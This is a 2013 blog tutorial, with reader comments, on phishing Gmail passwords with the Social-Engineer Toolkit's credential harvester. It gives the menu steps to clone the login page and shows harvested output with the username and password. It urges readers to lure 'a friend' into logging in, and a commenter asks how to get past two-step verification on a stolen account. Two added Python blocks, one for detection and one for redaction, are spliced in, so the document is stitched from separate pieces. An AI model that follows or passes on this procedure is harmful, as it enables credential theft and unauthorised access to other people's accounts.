Hack gmail password with social engineering toolkit (SET)

Social Engineering Toolkit

The Social Engineering Toolkit (SET) is the most powerful tool for performing social engineering attacks; in a way it is the Metasploit of social engineering. It provides a simple menu-driven interface for attacks such as phishing and browser exploitation. In this tutorial we will see how it can be used to perform a phishing attack that tries to capture someone's Gmail password.

Credential Harvester Attack

The Credential Harvester attack is one of the options inside SET. It clones a login page, starts a web server to serve it, and records any form data the user submits. Let's run it and see how it works.

Start SET in a terminal. It should come up with its welcome screen.

                 .M"""bgd `7MM"""YMM MMP""MM""YMM 
                ,MI    "Y   MM    `7 P'   MM   `7 
                `MMb.       MM   d        MM      
                  `YMMNq.   MMmmMM        MM      
                .     `MM   MM   Y  ,     MM      
                Mb     dM   MM     ,M     MM      
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]        The Social-Engineer Toolkit (SET)         [---]        
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: [email protected]         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>

For this attack we need "Social-Engineering Attacks" from the main menu. Type 1 and press Enter. SET presents another menu that looks like this:

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Here we can choose between the various kinds of social engineering attacks. For our purpose select option 2, "Website Attack Vectors". Another menu appears:

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

This time the menu comes with a short explanation of each attack. The Credential Harvester Attack Method, which we are going to use, is number 3. It is described as follows:

The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Select number 3 and proceed. Another menu appears:

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Here we are going to clone gmail.com to build the phishing page, so select option 2 (Site Cloner).

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.gmail.com

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

On selecting option 2, SET asks for two pieces of information: the IP address to which the cloned page should POST the submitted data, and the URL to clone, in this case gmail.com.

Enter the details and press Return when prompted. The credential harvester now starts a web server on port 80 that serves the cloned gmail.com page. Open the IP address of the SET machine in a browser, either from another machine or from localhost. For example, if SET is running on a machine with IP address 192.168.1.10, open "http://192.168.1.10" in a browser on another machine. Or give the IP address to someone else on the network :)

When a username and password are entered and submitted, SET captures the data and displays it on the terminal. After capturing the data, SET redirects the user to the real site, gmail.com:

192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: GALX=W37Icb1p3hI
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE
POSSIBLE USERNAME FIELD FOUND: Email=ghj
POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

Note the fields Email and Passwd: they contain the details typed by the user. To carry this out against a real user, such as a friend, you have to give them a link that they can open from their own computer to reach the SET clone of Gmail.

If SET is running on your local machine, you have to give the victim your public IP address. He opens the link and gets the Gmail login page; the rest of the task is to persuade him to log in through that page. If you manage that, you get the login details. The credential harvester attack is not limited to login data: it captures any form submission.

Phishing attacks are very common in the form of spam emails. Attackers set up phishing pages on web hosts and spread the links to users by email. The pages imitate anything from simple webmail sites to bank logins and more.
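The defender's view of the attack described above: the cloned Gmail page is served from a bare IP address over plain HTTP, and the browser POSTs the real form's field names (Email, Passwd) to that address instead of to Google. A proxy or egress log that records the destination URL and the posted field names can flag exactly that. The following is an added example, not part of SET or of the original post; the log format (one request per line: client, method, URL, comma-separated form field names) and the brand-to-domain mapping are constructed assumptions for the example.

```python
"""Detect login-form submissions that go to a host the form does not belong to.

Added example; neither part of SET nor of the original post. The log format
is constructed: "<client> <method> <url> <comma-separated form field names>",
as a forward proxy with request-body field logging might record it. The
mapping of brand to legitimate domain is an assumption for the example.
"""
import ipaddress
from urllib.parse import urlsplit

# Field names each real login form uses and the only domain allowed to receive
# them. Constructed for the example; Email/Passwd are the names SET reports.
BRAND_PROFILES = {
    "gmail": {"fields": {"Email", "Passwd"}, "domain": "google.com"},
}


def host_is_bare_ip(host: str) -> bool:
    """True if the URL host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return True


def host_in_domain(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain; 'evilgoogle.com' is not."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def analyse_request(method: str, url: str, fields: set) -> list:
    """Return the reasons a request looks like a credential-harvesting POST."""
    if method.upper() != "POST":
        return []
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    for brand, profile in BRAND_PROFILES.items():
        # Only requests carrying the brand's login field names are of interest.
        if not profile["fields"] <= fields:
            continue
        if not host_in_domain(host, profile["domain"]):
            reasons.append(f"{brand} login fields posted to foreign host {host!r}")
        if host_is_bare_ip(host):
            reasons.append("destination is a bare IP address, not a hostname")
        if parts.scheme != "https":
            reasons.append("credentials sent over plaintext HTTP")
    return reasons


def parse_line(line: str):
    """Split one constructed log line; '-' means no form fields were posted."""
    client, method, url, fieldspec = line.split(maxsplit=3)
    fields = set(fieldspec.split(",")) if fieldspec != "-" else set()
    return client, method, url, fields


def scan_log(lines) -> list:
    """Return (client, url, reasons) for every suspicious request in the log."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        client, method, url, fields = parse_line(line)
        reasons = analyse_request(method, url, fields)
        if reasons:
            alerts.append((client, url, reasons))
    return alerts


# Constructed sample log; the second line mirrors the harvested POST shown above.
SAMPLE_LOG = """\
192.168.1.101 GET http://192.168.1.7/ -
192.168.1.101 POST http://192.168.1.7/ Email,Passwd,signIn,PersistentCookie
192.168.1.55 POST https://accounts.google.com/login Email,Passwd,signIn
192.168.1.56 POST https://intranet.example.test/search q,page
"""

if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{client} -> {url}")
        for reason in reasons:
            print("   ", reason)
```

Only the POST to 192.168.1.7 is flagged, for all three reasons; the same field names posted to a google.com host over HTTPS pass, as does an unrelated form. The subset check on field names is what keeps the rule specific: it fires on the brand's login form wherever it is hosted, rather than on every POST that leaves the network.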

Last Updated On : 15th April 2013

7 Comments

  • is there a way to only grab a CERTAIN post in the harvester? i am doing some work for a company and they don’t want me grabbing passwords, just usernames.. any ideas?

  • I have also port forwarded my router as well

  • Well, it worked great; now I have the password of an email, but how can I trick Gmail into letting me access the account from another country? It asks for 2-step access. Is it possible to use some of the params?

    • VPN

  • Very interesting post! I followed your instructions; everything worked OK inside the LAN, but when I tried to use my external IP, the router login page appeared instead of Gmail. I use no-ip DUC and Hamachi VPN instead of port forwarding. Any guess? Thanks in advance

    • I have not used hamachi vpn, so not sure how to do this.

    • You have to configure port forwarding on your router. There will be a tutorial on this in the upcoming issue of ALM @ Facebook.com/AnonLinkPublications
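The first comment asks for a run that records usernames but not passwords, because the client does not want passwords captured. The menus shown above offer no such switch, so the constraint has to be applied to the harvester's output: the lines SET prints ("PARAM: name=value", "POSSIBLE USERNAME FIELD FOUND: ...", "POSSIBLE PASSWORD FIELD FOUND: ...") can be parsed and the secret values replaced before anything is written to a report. The following is an added example, not part of SET or of the original post; the line formats are those shown in the transcript above, and the sample username and password values are constructed.

```python
"""Redact password values from a SET credential-harvester transcript.

Added example; neither part of SET nor of the original post. It parses the
line formats SET prints (PARAM, POSSIBLE USERNAME/PASSWORD FIELD FOUND, the
WE GOT A HIT marker), keeps usernames, replaces password values, and returns
a per-hit summary. Sample values for Email and Passwd are constructed.
"""
import re

REDACTED = "[REDACTED]"
# Parameter names that hold secrets even when SET does not flag them.
SECRET_NAME_RE = re.compile(r"pass|pwd|pin\b|secret|otp|token", re.IGNORECASE)
PARAM_RE = re.compile(r"^PARAM: ([^=]+)=(.*)$")
USER_RE = re.compile(r"^POSSIBLE USERNAME FIELD FOUND: ([^=]+)=(.*)$")
PASS_RE = re.compile(r"^POSSIBLE PASSWORD FIELD FOUND: ([^=]+)=(.*)$")
HIT_MARKER = "[*] WE GOT A HIT!"


def redact_transcript(lines):
    """Return (sanitised_lines, hits); hits has one summary dict per captured POST."""
    sanitised, hits, current = [], [], None
    for raw in lines:
        line = raw.rstrip("\n")
        if line.startswith(HIT_MARKER):
            # A new POST begins; summaries are collected per hit.
            current = {"username": None, "redacted_fields": []}
            hits.append(current)
            sanitised.append(line)
            continue
        m = PASS_RE.match(line)
        if m:
            # Field SET itself flagged as a password: keep the name, drop the value.
            if current is not None:
                current["redacted_fields"].append(m.group(1))
            sanitised.append(f"POSSIBLE PASSWORD FIELD FOUND: {m.group(1)}={REDACTED}")
            continue
        m = USER_RE.match(line)
        if m:
            # Usernames are in scope for the report and are kept verbatim.
            if current is not None:
                current["username"] = m.group(2)
            sanitised.append(line)
            continue
        m = PARAM_RE.match(line)
        if m and SECRET_NAME_RE.search(m.group(1)):
            # Unflagged parameter whose name suggests a secret (e.g. "password").
            if current is not None:
                current["redacted_fields"].append(m.group(1))
            sanitised.append(f"PARAM: {m.group(1)}={REDACTED}")
            continue
        sanitised.append(line)
    return sanitised, hits


# Constructed sample in the format shown above; the Email and Passwd values
# are made up for the example.
SAMPLE_TRANSCRIPT = """\
192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: GALX=W37Icb1p3hI
POSSIBLE USERNAME FIELD FOUND: Email=demo.user
POSSIBLE PASSWORD FIELD FOUND: Passwd=correct-horse
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
"""

if __name__ == "__main__":
    clean, hits = redact_transcript(SAMPLE_TRANSCRIPT.splitlines())
    print("\n".join(clean))
    for hit in hits:
        print("username:", hit["username"], "redacted:", hit["redacted_fields"])
```

Feed it the captured terminal output rather than writing the raw transcript to disk first, so the password value never lands in the report or in a file that outlives the engagement. The name-based rule on PARAM lines covers forms where SET does not recognise the password field; its pattern list is a starting point, not a guarantee, so the sanitised output still deserves a manual look before it is shared.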
